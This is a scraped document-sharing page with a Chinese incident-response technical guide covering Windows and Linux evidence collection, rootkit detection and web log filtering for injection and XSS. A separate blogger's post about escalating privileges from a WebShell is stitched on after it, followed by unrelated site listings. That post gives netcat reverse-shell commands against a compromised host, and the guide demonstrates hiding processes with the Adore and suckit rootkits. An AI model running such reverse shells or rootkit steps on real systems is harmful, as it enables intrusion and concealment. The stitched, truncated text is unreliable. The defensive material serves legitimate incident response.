




已閱讀5頁,還剩74頁未讀, 繼續(xù)免費(fèi)閱讀
版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
應(yīng)急響應(yīng)技術(shù)指南應(yīng)急響應(yīng)技術(shù)指南 版權(quán)聲明版權(quán)聲明 本文中出現(xiàn)的任何文字?jǐn)⑹觥⑽臋n格式、插圖、照片、方法、過程等內(nèi)容,除另有特別注明,版權(quán)所有, 受到有關(guān)產(chǎn)權(quán)及版權(quán)法保護(hù)。任何個(gè)人、機(jī)構(gòu)未經(jīng)的書面授權(quán)許可,不得以任何方式復(fù)制或引用本文的任 何片斷。 適用性聲明適用性聲明 本文檔用于描述一般事件的應(yīng)急響應(yīng)流程及技術(shù)手段,供分支工程技術(shù)人員參考使用。 - - 目錄目錄 一. 前期準(zhǔn)備.1 1.1 應(yīng)急流程.1 1.1.1 現(xiàn)場(chǎng)應(yīng)急流程.1 1.1.2 遠(yuǎn)程支持流程.2 1.1.3 應(yīng)急支持接口.3 1.2 應(yīng)急工具包.3 1.2.1 Windows 系統(tǒng)快速信息收集.3 1.2.2 Windows 檢測(cè)工具包.6 1.2.3 UNIX/Linux 檢測(cè)工具包.7 1.2.4 WEB 檢測(cè)工具包.8 二. 技術(shù)指南.9 2.1 WINDOWS檢測(cè)技術(shù).9 2.1.1 Windows 常規(guī)檢測(cè).9 2.1.2 Windows 惡意代碼監(jiān)測(cè).14 2.2 UNIX/LINUX檢測(cè)技術(shù) .47 2.2.1 UNIX/Linux 常規(guī)檢測(cè).47 2.2.2 UNIX/Linux 惡意代碼監(jiān)測(cè).56 2.3 WEB 檢測(cè)技術(shù) .65 2.3.1 WEB 日志分析.65 - 0 - 一一. 前期準(zhǔn)備前期準(zhǔn)備 1.1 應(yīng)急流程應(yīng)急流程 1.1.1 現(xiàn)場(chǎng)應(yīng)急流程現(xiàn)場(chǎng)應(yīng)急流程 - 1 - 1.1.2 遠(yuǎn)程支持流程遠(yuǎn)程支持流程 - 2 - 1.1.3 應(yīng)急支持接口應(yīng)急支持接口 接口部門接口部門 技術(shù)支持部 服務(wù)支持組 接口人接口人 服務(wù)支持組 1.2 應(yīng)急工具包應(yīng)急工具包 1.2.1 Windows 系統(tǒng)快速信息收集系統(tǒng)快速信息收集 在應(yīng)急響應(yīng)過程中,對(duì) Windows 系統(tǒng)的檢查相對(duì)較多地依賴于第三方工具,而在沒有 可用第三方檢查工具或由于某些特殊原因而無法在被檢查系統(tǒng)上運(yùn)行其他工具時(shí),可參考本 節(jié),以便能在借助系統(tǒng)自帶工具的情況下快速收集信息。 系統(tǒng)信息系統(tǒng)信息 開始 程序 附件 系統(tǒng)工具 系統(tǒng)信息(或直接 開始運(yùn)行 winmsd ) 在系統(tǒng)信息的系統(tǒng)摘要中可獲取基本的系統(tǒng)信息,可通過截圖或保存為 NFO 文件 - 3 - 用戶信息用戶信息 命令行方式:命令行方式:net user,可直接收集用戶信息,若需查看某個(gè)用戶的詳細(xì)信息,可使用 命令 net user username 圖形界面:圖形界面:開始 運(yùn)行 compmgmt.msc 本地用戶和組 用戶 注冊(cè)表:注冊(cè)表:開始 運(yùn)行 regedit(Windows 2000 系統(tǒng)需運(yùn)行 regedt32),打開 HKEY_LOCAL_MACHINESAM,為該項(xiàng)添加權(quán)限(如下圖) 添加權(quán)限完成后按 F5 刷新即可訪問子項(xiàng)。 打開:HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers 在此項(xiàng)下,導(dǎo)出所有以 00000 開頭的項(xiàng),將所有導(dǎo)出項(xiàng)與 F4(該項(xiàng)對(duì)應(yīng) administrator 用戶)導(dǎo)出內(nèi)容做比較,若其中“F”值內(nèi)容相同,則可能為克隆用戶 進(jìn)程、服務(wù)、驅(qū)動(dòng)信息進(jìn)程、服務(wù)、驅(qū)動(dòng)信息 進(jìn)程:進(jìn)程:打開系統(tǒng)信息工具,依次打開 軟件環(huán)境 正在運(yùn)行任務(wù),在此可查看進(jìn)程名及 其對(duì)應(yīng)的執(zhí)行文件 - 4 - 服務(wù):服務(wù):打開系統(tǒng)信息工具,依次打開 軟件環(huán)境 服務(wù),在此可查看服務(wù)的啟動(dòng)情況及 其對(duì)應(yīng)的啟動(dòng)文件 驅(qū)動(dòng):驅(qū)動(dòng):打開系統(tǒng)信息工具,依次打開 軟件環(huán)境 系統(tǒng)驅(qū)動(dòng)程序,在此可查看驅(qū)動(dòng)的啟 動(dòng)情況及其對(duì)應(yīng)的驅(qū)動(dòng)文件 模塊:模塊:打開系統(tǒng)信息工具,依次打開 軟件環(huán)境 加載的模塊,在此可查看被加載的 DLL 文件及其對(duì)應(yīng)的文件路徑 啟動(dòng)項(xiàng):?jiǎn)?dòng)項(xiàng):打開系統(tǒng)信息工具,依次打開 軟件環(huán)境 啟動(dòng)程序,在此查看啟動(dòng)程序名及 其對(duì)應(yīng)的啟動(dòng)文件路徑 若需對(duì)以上信息進(jìn)行保存,可保存為 NFO 文件,或選擇導(dǎo)出菜單導(dǎo)出為文本文件。 日志與文件日志與文件 查看系統(tǒng)日志:查看系統(tǒng)日志:開始 運(yùn)行 eventvwr,選擇要查看的日志類型 若需導(dǎo)出系統(tǒng)日志,可右鍵選擇要收集的日志類型,選擇“另存日志文件”,建議導(dǎo)出 為 csv 文件,方便快速統(tǒng)計(jì)。 其他程序日志:其他程序日志: IIS 日志:日志:IIS 日志默認(rèn)存儲(chǔ)于%systemroot%system32LogFiles,若被檢測(cè)主機(jī)為虛 擬主機(jī),為判斷每個(gè)虛擬站點(diǎn)對(duì)應(yīng)的 IIS 日志,可使用 IIS 管理腳本 findweb.vbs 命令格式為 cscript findweb.vbs test2 輸出結(jié)果如下 Web Site Number = 4 Web Site Description = test2 Hostname = - 5 - Port = 80 IP Address = 由輸出判斷該站點(diǎn)對(duì)應(yīng)的日志路徑為 %systemroot%system32LogFilesW3SVC4 Apache 日志:日志:apache for win32 的日志默認(rèn)存儲(chǔ)于其安裝目錄下的 logs 目錄中,其中 access.log 為訪問日志,若該日志不存在或較長時(shí)間未出現(xiàn)過更新,則日志路徑可能被修改, 應(yīng)查看 httpd.conf 文件中的下列字段 ErrorLog logs/error.log CustomLog logs/access.log common 根據(jù) CustomLog 字段指定的路徑,可獲取真實(shí)的日志文件位置。 網(wǎng)絡(luò)信息網(wǎng)絡(luò)信息 Windows 2000 下可使用 netstat an 命令收集網(wǎng)絡(luò)連接信息。 Windows XP 以后版本中可使用 netstat ano 命令收集網(wǎng)絡(luò)信息。 補(bǔ)丁信息補(bǔ)丁信息 Windows 2000 系統(tǒng)中,收集補(bǔ)丁信息可直接訪問注冊(cè)表路徑 HKEY_LOCAL_MACHINESOFTWAREMicrosoftUpdates,該路徑下存儲(chǔ)了系統(tǒng)及 Windows 組件的補(bǔ)丁安裝信息。 Windows XP 以后版本的系統(tǒng)中,可使用 WMIC 命令收集補(bǔ)丁信息,運(yùn)行命令 wmic qfe 注:為避免輸出過多信息,可使用命令 wmic qfe get Description, HotFixID 或 調(diào)整 cmd 窗口的寬度、高度及高和寬的緩沖區(qū)大小。 1.2.2 Windows 檢測(cè)工具包檢測(cè)工具包 分類分類命令命令 cross(uid=500)-root for su service 此類提升權(quán)限的信息需要我們引起足夠的重視,很有可能是入侵者留下的痕跡。 (3)cron 日志 cron 指 Unix 允許用戶設(shè)定在某一時(shí)間執(zhí)行程序,日志文件默認(rèn)記錄在/var/log/cron 中 - 53 - (4)登錄日志 通過 ssh 登錄的信息,存放在/var/log/secure 中,下面是一個(gè) ssh 暴力破解密碼的日志 記錄 (5)shell 日志 bash 的歷史記錄存放在用戶主目錄下.bash_history 中,用戶所有輸入的命令都會(huì)記錄, 如果攻擊者未刪除此日志,就可以仔細(xì)分析并判斷攻擊者的行為,比如:攻擊者得到一個(gè)低 權(quán)限用戶,然后編譯漏洞利用程序提升權(quán)限,在這里就可以記錄他輸入的命令。 - 54 - (6)apache 日志 Apache HTTP 服務(wù)器提供了非常全面而靈活的日志記錄功能,利用 Apache 的日志文件 可以反饋出服務(wù)器的訪問信息,錯(cuò)誤信息等。主要包含 Apache 訪問日志 access_log 和錯(cuò)誤 日志 error_log 等 以 rpm 方式安裝的 apache 的日志存放在/var/log/httpd 中(如圖),使用源碼安裝的 apache 的日志存放在 apache 安裝目錄 log 文件夾中 SUID 文件文件 SUID 代表 Set User ID, SGID 代表 Set Group ID,當(dāng)一個(gè)可執(zhí)行文件被設(shè)置 SUID 時(shí), 任何用戶運(yùn)行此文件時(shí),都將以文件屬主的權(quán)限執(zhí)行,如圖:passwd 命令被設(shè)置 SUID - 55 - 我們可以使用 find 命令搜索硬盤中所有 SUID 文件,注意觀察搜索結(jié)果,看是否有可疑 文件。 find / -perm - type f print RPM 完整性檢查完整性檢查 在 Linux 系統(tǒng)下可以使用 rpm V 來判斷軟件包中的文件是否被修改,例如: 也可以使用 rpm Va 命令來列出系統(tǒng)中所有發(fā)生過修改的軟件包(包括可執(zhí)行文件、 配置文件等)。 命令將列出校驗(yàn)失敗的文件,含義如下: S大小改變大小改變 M權(quán)限改變 5MD5 改變 L連接改變 D設(shè)備改變 - 56 - U用戶改變 G組改變 T日期和時(shí)間改變 missing文件丟失 網(wǎng)絡(luò)連接網(wǎng)絡(luò)連接 查看系統(tǒng)當(dāng)前開放的端口可以使用命令 netstat anp,列出本機(jī)開放的端口,端口對(duì)應(yīng) 的進(jìn)程的 PID 值,連接狀態(tài)等信息 使用命令 lsof i 也可以查看系統(tǒng)當(dāng)前開放的端口及端口對(duì)應(yīng)的進(jìn)程的 PID 值等信息 - 57 - 2.2.2 UNIX/Linux 惡意代碼監(jiān)測(cè)惡意代碼監(jiān)測(cè) 本章節(jié)描述了常見惡意代碼檢查工具的使用方法和技巧,同時(shí)列舉了常見惡意程序的原 理和分類,不能完整覆蓋全部已知惡意程序。 如需要了解更多的惡意程序查殺實(shí)例,請(qǐng)參考常見惡意程序查殺指南。 用戶模式用戶模式 rootkit-lrk5 檢測(cè)檢測(cè) LRK5 是一種工作在用戶級(jí)(ring3)下的 rootkit,通過替換系統(tǒng)原有文件的方式實(shí)現(xiàn)隱 藏功能。 檢測(cè)方式主要有兩種: 1、文件完整性工具 Tripwire 需要基準(zhǔn)校驗(yàn)庫 2、專用 rootkit 檢測(cè)工具 Chkrootkit Rootkithunter Rootkit-redstorm 使用檢測(cè)使用檢測(cè) 1、下載解壓 redstorm 壓縮包 toolkit.gz,使用./install 安裝。 - 58 - 2、安裝后可只用/bin/hate/sk 命令執(zhí)行隱藏等操作。 3、使用 rkhunter c 命令可檢查出系統(tǒng)感染 r3dstorm rootkit。 - 59 - LKM Rootkit-Adore 使用檢測(cè)使用檢測(cè) 根據(jù)系統(tǒng)的類型,攻擊者有不同的方法來對(duì)內(nèi)核進(jìn)行修改,在 N 種 Unix 系統(tǒng)上修改內(nèi) 核最簡(jiǎn)單的方法就是利用系統(tǒng)本身的加載的內(nèi)核模塊(LKM)的功能,因此大多數(shù)的內(nèi)核級(jí) Rootkit 通過利用 LKM 動(dòng)態(tài)地將內(nèi)核更新來提供新功能,新添加的模塊擴(kuò)展了內(nèi)核,修改了 系統(tǒng)調(diào)用表,同時(shí)對(duì)內(nèi)核和其他使用內(nèi)核的所有東西有了完全訪問權(quán)。 下面看一個(gè) LKM rootkit 實(shí)例-Adore: 編譯運(yùn)行 adore,configure 后需修改 Makefile 中的 INC 為系統(tǒng)對(duì)應(yīng)位置。relink 時(shí)選擇 一個(gè) LKM,使用 startadore 運(yùn)行 adore。 - 60 - - 61 - 使用 adore 隱藏某進(jìn)程,找到 gedit 的 pid 為 2113,使用./ava i 2113 命令隱藏該進(jìn)程, 以下第二個(gè)截圖中的 gedit 被隱藏。 - 62 - 使用 adore 隱藏文件 a,執(zhí)行 ava h ./a 后用 ls a 命令無法看到文件 a,執(zhí)行 ava u ./a 后,文件 a 恢復(fù)顯示。 - 63 - 使用 rkhunter -c 命令檢測(cè)系統(tǒng),可看到 8 個(gè)可疑文件。 - 64 - /dev/kmen rootkit 使用檢測(cè)使用檢測(cè) /dev/kmem 包含內(nèi)核自身存儲(chǔ)空間印象,當(dāng)前正在運(yùn)行的內(nèi)核代碼也位于這部分內(nèi)存空 間中。通過/dev/kmem 修改內(nèi)存中的內(nèi)核,Sd 和 Devik 編寫代碼搜索/dev/kemen,查找系 統(tǒng)調(diào)用表, 例如:SYS_open、SYS_read、SYS_execve 然后通過下面兩個(gè)自己實(shí)現(xiàn)的函數(shù)來達(dá)到修改系統(tǒng)調(diào)用表的目的,從而實(shí)現(xiàn) rootkit 功能。 rkm(read kernel memory)讀取內(nèi)核空間各個(gè)有用的項(xiàng) wkm(write kernel memory)直接向內(nèi)核存儲(chǔ)空間寫入代碼 下面看下/dev/kmen rootkit 實(shí)例-suckit 編譯生成可執(zhí)行程序 sk。使用命令./deps,make。 初次使用./sk 或./sk C 命令,配置 suckit,選擇隱藏文件的前綴及根目錄,同時(shí)配置密 碼。 - 65 - 運(yùn)行 sk,輸入密碼后,可使用 sk h pid 隱藏進(jìn)程。 使用工具檢測(cè)檢測(cè)未發(fā)現(xiàn)明顯異常??梢罁?jù)警告項(xiàng)或無法檢測(cè)的項(xiàng)目進(jìn)一步分析。 - 66 - 2.3 WEB 檢測(cè)技術(shù)檢測(cè)技術(shù) 2.3.1 WEB 日志分析日志分析 IIS 日志日志 .1 IIS 日志路徑日志路徑 IIS 日志默認(rèn)保存在%systemroot%system32LogFiles目錄下 對(duì)于虛擬主機(jī),可使用 findweb.vbs 腳本進(jìn)行檢查,詳情參考本文檔 節(jié)。 - 67 - .2 IIS 日志格式定義日志格式定義 注:每條日志記錄的時(shí)間均為 GMT 標(biāo)準(zhǔn)時(shí)間,計(jì)算時(shí)間需要 GMT+8 Apache 日志日志 .1 Apache 日志路徑日志路徑 Linux 系統(tǒng)中,apache 的訪問日志默認(rèn)位置為 /var/log/httpd/access.log Windwos 系統(tǒng)中,apache 的訪問日志默認(rèn)位置為 apache 安裝目錄下的 logs 目錄中的 access.log。 若日志不在默認(rèn)路徑,可查看配置文件 httpd.conf 中 CustomLog 字段。 .2 Apache 日志格式定義日志格式定義 52 - - 30/Apr/2009:14:56:00 +0800 GET /index.php HTTP/1.0 200 5172 5230/Apr/2009:14:56:00 +0800 GET /index.php HTTP/1.0 2005172 遠(yuǎn)程遠(yuǎn)程 IP 地址地址訪問時(shí)間請(qǐng)求路徑狀態(tài)值傳輸數(shù)據(jù)大小 注: 默認(rèn)配置的 apache 日志只記錄 common 類型,apache 對(duì) common 類型的默認(rèn)定義為 LogFormat %h %l %u %t %r %s %b common,這些信息不足以支撐一般的行為分析, 建議使用 combined 類型,combined 類型的默認(rèn)定義為 LogFormat %h %l %u %t %r %s %b %Refereri %User-Agenti combined (也可以根據(jù)用戶需求自定義)。 啟用方法為:注釋掉默認(rèn)使用的 CustomLog logs/access.log common 將#CustomLog logs/access.log combined 前的注釋符去掉以將其啟用。 重新啟動(dòng) apache 或 kill HUP cat /var/run/httpd.pid。 - 68 - WEB 事件分析事件分析 .1 遠(yuǎn)程掃描遠(yuǎn)程掃描 遠(yuǎn)程掃描行為一般通過兩方面進(jìn)行判斷:1、時(shí)間連續(xù)性;2、User-Agent 1、時(shí)間連續(xù)性 當(dāng) WEB 日志除出現(xiàn)在極短時(shí)間內(nèi)的對(duì)不同頁面且來自同一 IP 地址的連續(xù)訪問請(qǐng)求, 則可認(rèn)為該 IP 地址對(duì)主機(jī)發(fā)起掃描。 2、User-Agent 2.1、IIS 日志日志 大部分掃描器在掃描時(shí),會(huì)構(gòu)造自己特有的 User-Agent 字段。通過搜索 User- Agent 字段中的特殊值可以判斷掃描行為。 IIS 日志,可使用日志,可使用 logparser 進(jìn)行自動(dòng)化檢索,命令格式:進(jìn)行自動(dòng)化檢索,命令格式: logparser -i:iisw3c -o:csv select * into log.csv from ex.log where cs(User-Agent) LIKE %Some-User-Agent-Keyword% 參數(shù)解釋:參數(shù)解釋: -i:iisw3c,-i(input)參數(shù)含義為輸入文件的類型,這里為 IIS 日志,若忽略該參數(shù), 則 logparser 會(huì)自動(dòng)檢查格式 -o:csv,-o(output)定義了輸出格式,這里輸出格式為 CSV,如果忽略該參數(shù), 則在標(biāo)準(zhǔn)輸出上輸出結(jié)果 Select into file.csv from file.log,從 file.log 日志中選擇特定的字段,并將結(jié)果 寫入 file.csv 文件中,如果沒有-o 參數(shù),則此處應(yīng)忽略 into file.csv Select cs(User-Agent) LIKE %keywords%,LIKE 用于實(shí)現(xiàn)模糊匹配,如:此 處就實(shí)現(xiàn)了對(duì) cs(User-Agent)字段的匹配,檢查該字段中是否包含 keyword。 2.2、Apache 日志(日志(UNIX/Linux) 對(duì)于 apache 日志,若想通過 User-Agent 篩選,則需選擇記錄 combined 格式的日 志.。 篩選方式可通過簡(jiǎn)單的篩選方式可通過簡(jiǎn)單的 grep 進(jìn)行,命令格式:進(jìn)行,命令格式: grep -i Some-User-Agent-Keyword access.log 參數(shù)解釋:參數(shù)解釋: -i:不區(qū)分大小寫 - 69 - .2 注入攻擊注入攻擊 在 WEB 日志中進(jìn)行注入分析時(shí),可通過對(duì)請(qǐng)求的關(guān)鍵字進(jìn)行過濾,以檢測(cè)可能出現(xiàn)的 注入攻擊。 但在默認(rèn)配置下,IIS 和 Apache 日志均不記錄 POST 數(shù)據(jù)和 COOKIE 內(nèi)容,因此只能 檢測(cè)基于 URL 方式的 GET 注入。 1、IIS 日志過濾 logparser -i:iisw3c -o:csv select * into log.csv from ex.log where cs-uri- query LIKE %select% 以上命令對(duì) cs-uri-query 字段進(jìn)行過濾,查找關(guān)鍵字 select 類似的關(guān)鍵字還包括: ;,and,|,exec,insert,select,delete,update,count,*,%,chr,mid,master,truncate,char,decl are(使用逗號(hào)分隔) 2、Apache 日志過濾 grep -i GET.*.php?.*=.*union.*select.* apache.log 查找形如 GET /xxx.php?id=10 union select .的請(qǐng)求 .3 URL 型跨站腳本型跨站腳本 URL 型跨站大多是由于通過 URL 傳遞參數(shù)到程序后,程序?qū)?shù)未做過濾而直接展示 在頁面上,從而形成跨站。 1、IIS 日志過濾 logparser select * from ex.log where cs-uri-query LIKE %script% 2、Apache 日志過濾 grep -i GET.*.* apache.log .4 錯(cuò)誤參數(shù)構(gòu)造錯(cuò)誤參數(shù)構(gòu)造 部分程序在接收參數(shù)時(shí),不但未對(duì)參數(shù)進(jìn)行過濾,還未對(duì)參數(shù)是否在程序的處理范圍之 內(nèi)也未做檢查,如:一些存在問題的下載程序往往會(huì)將下載目標(biāo)文件作為其參數(shù),而在用戶 傳遞下載目標(biāo)文件這一參數(shù)給下載程序時(shí),程序本身不對(duì)參數(shù)進(jìn)行嚴(yán)格過濾,因此可能導(dǎo)致 用戶惡意下載一些非授權(quán)文件和源程序。 1、IIS 日志過濾 - 70 - logparser select * from ex.log where cs-uri-stem LI KE %article/show.asp% and cs-uri-query not LIKE %normal% 其中 cs-uri-stem 用于標(biāo)明請(qǐng)求目標(biāo)為 arctile/show.asp 文件,cs-uri-query 為對(duì)目標(biāo)頁 面 show.asp 發(fā)出的請(qǐng)求,該語句用于查找所有對(duì) arctile/show.asp 文件發(fā)起的請(qǐng)求字符串中 不包含 normal 字符串的日志。 即,對(duì) arctile/show.asp 的正常請(qǐng)求中,必定包含字符串 normal,當(dāng)惡意用戶進(jìn)行構(gòu)造 時(shí),可能會(huì)修改原有的正常字符串 normal。 同理,也可以搜索用戶所關(guān)心的內(nèi)容,如: logparser select * from ex.log where cs-uri-stem LI KE %download.asp% and cs-uri-query LIKE %.asp% 檢查所有對(duì) download.asp 發(fā)起的請(qǐng)求中,是否包含“.asp”。 2、Apache 日志過濾 假設(shè) index.php 接受正常請(qǐng)求格式為:index.php?img=xxxLogoyyy 以下 grep 語句用于過濾所有 index.php 接受 img 參數(shù)的請(qǐng)求,并且將正常請(qǐng)求從其中過 濾,只打印異常請(qǐng)求: grep -i GET.*index.php?img=.* | grep -v -i GET.*.php?.*=.*logo.* 另外,可進(jìn)行如下匹配: grep i “GET.*viewdoc.php?.*type=edit.*HTTP” 搜索對(duì) viewdoc.php 文件發(fā)起的請(qǐng)求中,是否有包含 type=edit 的字符串。 三三. 報(bào)告輸出報(bào)告輸出 3.1 報(bào)告模板報(bào)告模板 應(yīng)急響應(yīng)報(bào)告模板. doc - 71 - 3.2 報(bào)告內(nèi)容報(bào)告內(nèi)容 應(yīng)急響應(yīng)報(bào)告應(yīng)盡量詳細(xì)的描述整個(gè)處理過程,其中包括: 具體的處理操作 如:執(zhí)行哪些命令,使用哪些工具,從這些命令和工具中可以分析出哪些結(jié)果。 操作的時(shí)間范圍 為避免操作引起的日志影響分析和意外發(fā)生,應(yīng)記錄每次操作的時(shí)間,時(shí)間可不必 過于精確,但要記錄下大致時(shí)間范圍。 如:15:30-15:40,使用 XX 工具對(duì)系統(tǒng)進(jìn)行 XX 操作。 最終處理結(jié)果 每項(xiàng)可能對(duì)結(jié)果有直接影響的操作結(jié)果應(yīng)被記錄在報(bào)告中。 原因分析 根據(jù)現(xiàn)場(chǎng)分析的結(jié)果,得出引起事件的原因。 安全建議 - Author:zerosoul(零魂) 轉(zhuǎn)載請(qǐng)注明出處,否則就別轉(zhuǎn).(昨天又不小心搜到篇自己以前寫的文章,轉(zhuǎn)了很多地方,沒見一 個(gè)寫版權(quán)的) 昨晚(應(yīng)該是今天凌晨)玩了半天朋友給的 Linux 的 WebShell,本來想實(shí)踐一下 UDEV 提權(quán)呢,最 后發(fā)現(xiàn)服務(wù)器貌似已經(jīng)打過補(bǔ)丁了。 不過還是有其他的收獲的,所以我就 YY 下 Linux 反彈 shell 的問題。 Linux 提權(quán)絕大部分都靠的是 Local Exploit。WebShell 一般都可以執(zhí)行命令,但是我們的 EXP 必須在可交互環(huán)境運(yùn)行,否則如果直接在 WebShell 執(zhí)行,即使能提權(quán)成功,我們也沒法利用到。 所以我們需要先反彈一個(gè) CmdLine Shell 回來(直接說成 CmdShell 怕人誤解.因?yàn)?Win 有個(gè) cmd.exe _),然后在命令行終端下執(zhí)行 EXP 進(jìn)行提權(quán)。 一般情況下,絕大多數(shù)人都會(huì)通過 PHP WebShell 的 Back Connect 功能彈回一個(gè) Shell,但是有 時(shí)候會(huì)碰到服務(wù)器不支持 PHP 或者 WebShell 沒法反彈的情況,比如這兩天朋友給我的一個(gè) JSPShell 所在服務(wù)器只支持 JSP,不支持 PHP。這時(shí)候,我們經(jīng)典的 netcat 就可以派上用場(chǎng)了。 平時(shí)在 Windows 下做事的時(shí)候,在必要的情況下我們可以先在本機(jī)運(yùn)行 nc -vv -lp 1234 監(jiān)聽端 口,然后在肉雞上 nc 1 1234 -e cmd.exe 給我們反彈一個(gè) CmdShell,這個(gè)方法在 Linux 仍然可行。 在本機(jī)監(jiān)聽后,在 WebShell 運(yùn)行 nc 1 1234 -e /bin/sh 就能彈一個(gè) CmdLine Shell 給 - 72 - 我們。 但我們經(jīng)常碰到的情況并不都是這么 100%順利的,像昨晚整的那兩臺(tái),每臺(tái)都是不能直接執(zhí)行 nc 的。一臺(tái)有 nc,但執(zhí)行從是不起作用,另外一臺(tái)直接壓根就沒有 nc. 不過,這個(gè)難不倒我們,我們可以給他裝一個(gè)嘛,比較快捷的方法是,我們可以到 下載 nc 的源碼,先在我們自己 linux 機(jī)器上編譯好以 后把 bin 文件傳上去(我開始傳的我的 Debian 自帶的 netcat,結(jié)果仍然不能運(yùn)行.)。如果還不行, 那就把源碼傳上去,在目標(biāo)機(jī)器上直接編譯。 昨晚那兩臺(tái)機(jī)器,一臺(tái)我是直接傳的本地編譯后的,一臺(tái)是在目標(biāo)機(jī)器上編譯的。如果直接傳的 nc 可以運(yùn)行的話還比較好說,如果需要在目標(biāo)機(jī)器上編譯的話,這里有點(diǎn)小技巧: 因?yàn)樵诘玫?CmdLine Shell 前,我們只能在 WebShell 里執(zhí)行命令,一
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 新疆昌吉市教育共同體2025年中考模擬最后十套:生物試題(八)考前提分仿真卷含解析
- 2025年中國機(jī)箱前面板數(shù)據(jù)監(jiān)測(cè)研究報(bào)告
- 2025-2030年中國二手汽車行業(yè)風(fēng)險(xiǎn)評(píng)估及市場(chǎng)運(yùn)行形勢(shì)預(yù)測(cè)研究報(bào)告
- 2025年中國木塑柄雙夾油灰刀數(shù)據(jù)監(jiān)測(cè)報(bào)告
- 2025年中國木制托板數(shù)據(jù)監(jiān)測(cè)報(bào)告
- 2025年中國方型氣壓夾盤市場(chǎng)調(diào)查研究報(bào)告
- 2025年中國數(shù)據(jù)采集處理信息系統(tǒng)數(shù)據(jù)監(jiān)測(cè)報(bào)告
- 2025-2030年中國二氧化碳行業(yè)發(fā)展前景及投資戰(zhàn)略規(guī)劃研究報(bào)告
- 2025-2030年中國不銹鋼絲市場(chǎng)現(xiàn)狀分析及投資可行性預(yù)測(cè)報(bào)告
- 肇慶市實(shí)驗(yàn)中學(xué)高中生物三:免疫調(diào)節(jié)導(dǎo)學(xué)案(第課時(shí))
- 創(chuàng)傷急救-止血、包扎課件
- DBJ51T 196-2022 四川省智慧工地建設(shè)技術(shù)標(biāo)準(zhǔn)
- 企業(yè)培訓(xùn)5W2H分析法(31P PPT)
- 鑰匙移交清單
- DB11-T211-2017園林綠化用植物材料木本苗
- 豬肉品質(zhì)及其營養(yǎng)調(diào)控
- 關(guān)于完善和落實(shí)罪犯互監(jiān)制度的思考
- 四川大學(xué)-劉龍飛-畢業(yè)答辯PPT模板
- GB∕T 40501-2021 輕型汽車操縱穩(wěn)定性試驗(yàn)通用條件
- 認(rèn)識(shí)浮力+阿基米德原理
- 防止電力生產(chǎn)重大事故地二十五項(xiàng)反措
評(píng)論
0/150
提交評(píng)論